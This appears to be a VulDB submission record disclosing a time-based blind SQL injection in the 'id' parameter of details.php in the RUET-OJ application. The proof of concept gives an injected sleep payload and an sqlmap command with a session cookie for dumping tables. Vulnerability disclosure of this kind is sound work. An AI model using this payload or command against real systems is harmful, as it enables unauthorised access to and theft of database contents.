| Title | shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - details.php |
|---|
| Description | There is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the details.php file, allowing an attacker to dump the entire database. You must be authenticated.
[POC]
With Burp browser
GET /details.php?id=1'and+sleep(5)%23
Automate with sqlmap to perform the database dump.
sqlmap -u http://ip/details.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| User | ManinhuGuitar (UID 84672) |
|---|
| Submit | 14/10/2025 01:42 AM (6 months ago) |
|---|
| Moderation | 27/10/2025 11:22 AM (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 330106 [shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /details.php ID SQL injection] |
|---|
| Points | 17 |
|---|